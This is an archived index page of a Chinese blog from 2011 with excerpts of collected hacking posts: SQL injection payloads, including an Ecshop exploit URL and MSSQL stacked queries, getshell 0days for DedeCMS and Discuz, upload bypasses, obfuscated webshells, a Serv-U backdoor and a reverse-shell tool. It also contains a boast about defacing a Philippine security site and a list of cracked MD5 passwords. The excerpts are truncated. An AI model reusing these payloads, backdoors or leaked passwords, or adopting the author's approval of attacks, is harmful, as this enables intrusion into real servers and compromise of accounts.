收集盒 Book box

大多数文章收集自互联网

手工注入大全学习手册

<br /><br />手工注入大全<br />1.判断有无注入点<br />‘ ; and 1=1 and 1=2<br />2.猜表: 常见的表:admin adminuser user pass password 等..<br...

2011-03-31 23:18:00

阅读数 524

评论数 0

PHP168 V6.01/6.02权限提升及暴本地路径漏洞

<br /><br />摘要:发布日期:2010-12.15 发布作者:佚名 影响版本:PHP168 V6.01/6.02 官方网站:http://www.php168.net 漏洞类型:设计错误 漏洞描述:PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源...

2011-03-31 23:11:00

阅读数 641

评论数 0

N点主机管理系统密码解密代码程序

<br />2010年12月20日 星期一 07:22<br /><br />之前有写过<N点主机管理系统漏洞利用与防御措>的文章,那个我感觉其实也不算是漏洞吧.<br />这次在发个N点主机管理系统的加密密码解密漏洞利用代码程序吧,呵呵...

2011-03-31 23:10:00

阅读数 1245

评论数 0

DEDEcms GET shell 再次通杀 所有版本

<br />还是上次的那个dede getshell 漏洞 ,只不过官方的补丁没有补到位。<br /><br />现在其基础上,修改图片代码实现最新版本补丁突破。<br />找一张图片,在保留图片代码的同时,插入如下代码<br /><...

2011-03-31 23:07:00

阅读数 816

评论数 0

Ecshop 漏洞集合

Ecshop 漏洞集合一、EXP:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWx

2011-03-31 23:06:00

阅读数 2261

评论数 0

Mssql Public权限列目录

<br />注入点执行<br />aaa.com/xxx.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarchar(...

2011-03-31 22:56:00

阅读数 550

评论数 0

不改文件名的情况下上传突破

<br /><br />方法不错,首先就是不强制改上传文件名。还有就是上传目录没有执行的权限。<br />然后用这方法貌似就可以上传到上级可写目录了。<br />比如抓这是抓的上传数据包:<br />POST /upload/upfile...

2011-03-28 17:20:00

阅读数 471

评论数 0

freetextbox最新上传0day

<br /><br />freetextbox跟fckeditor多是国外的一款编辑器。用的还挺多的。<br />基于.NET。<br />漏洞描述:所有版本 没做登陆验证可以直接访问上传木马<br />Freetextbox 3-3-1...

2011-03-25 02:47:00

阅读数 486

评论数 0

菲律宾 IT安全网被黑

<br /><br />继上次总统通讯部被我黑,当时服务器的网管还来我的百度博客注册个账户在文章下评论骂我,这次又黑了IT安全网,哈哈!菲律宾本来就是SB,好舒畅啊~~~ ‍<br />http://www.it-security-online.ch<br...

2011-03-22 16:39:00

阅读数 482

评论数 0

收費MD5公布

MD:af1948f9e4261e44Result:1275116717MD:2a33182a0f6d3d1aResult:wxm850505MD:60e5eff90873642cResult:ssssssssMD:eb348d740d0339d7Result:feihua2008MD:4f962...

2011-03-21 12:59:00

阅读数 696

评论数 0

discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来

<br />discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~<br /><br /><br />附上 <br />从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,...

2011-03-20 21:16:00

阅读数 1468

评论数 0

mickey:搞内网最常用的工具整理

<br /><br /> <br />http://www.edge-security.com/soft/wfuzz-1.4b-win.tar.gz<br /> <br />http://nmap.org/dist/nmap-5.00-w...

2011-03-19 16:07:00

阅读数 464

评论数 0

Serv-U BlackDoor [Version:6.4.x]

<br /><br /><br /><br /><br /><br />==================================<br />安装方法:<br />将DLL放到Serv-U 安...

2011-03-19 16:02:00

阅读数 433

评论数 0

变形aspwebshell & phpwebshell[Lcx]

<br /><br />asp版的,这是utf-8编码,自己看着弄吧<br /><%@LANGUAGE=”JAVASCRIPT” CODEPAGE=”65001″%><br /><%<br />var lcx = {‘名...

2011-03-19 15:59:00

阅读数 1548

评论数 0

反弹先锋Win32.ConnectBackShell

<br /><br />Connect back shell golds7n version<br />bc <ip> <port> [shell]<br /><br />用法:  bc   ip地址  端口   ...

2011-03-19 15:37:00

阅读数 524

评论数 0

黑盒白盒测试工具

<br /><br />http://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis<br />C/C++<br />1、flawfinder<br />http:...

2011-03-19 15:37:00

阅读数 867

评论数 0

ASP .NET PHP 注入页面构造

<br /><br />Mssql:<br /><!--#include file="conn.asp"--> <br /><% <br />hid=request.QueryString("...

2011-03-19 15:16:00

阅读数 345

评论数 0

linux下用webshell修改文件权限

<br /><br />当我们拥有了一个linux下的shell(服务器上多个网站)。<br />这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。<br />那么,这样的主机设置肯定是不安全的。<br />有的时候...

2011-03-19 15:15:00

阅读数 445

评论数 0

利用系统保留文件名创建无法删除的webshell

<br /><br />Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:<br />D:/wwwroot&g...

2011-03-19 15:14:00

阅读数 359

评论数 0

获取IIS虚拟网站信息的工具

<br /><br />工具适用人群:获取服务器或webshell权限后,想知道服务器上到底有哪些虚拟网站,这些网站的域名什么,网站绑定的端口,该网站是否停用,网站的物理路径是什么,网站的有哪些虚拟目录,虚拟目录的名字和物理路径是什么<br />该工具并非完全原...

2011-03-19 15:13:00

阅读数 590

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭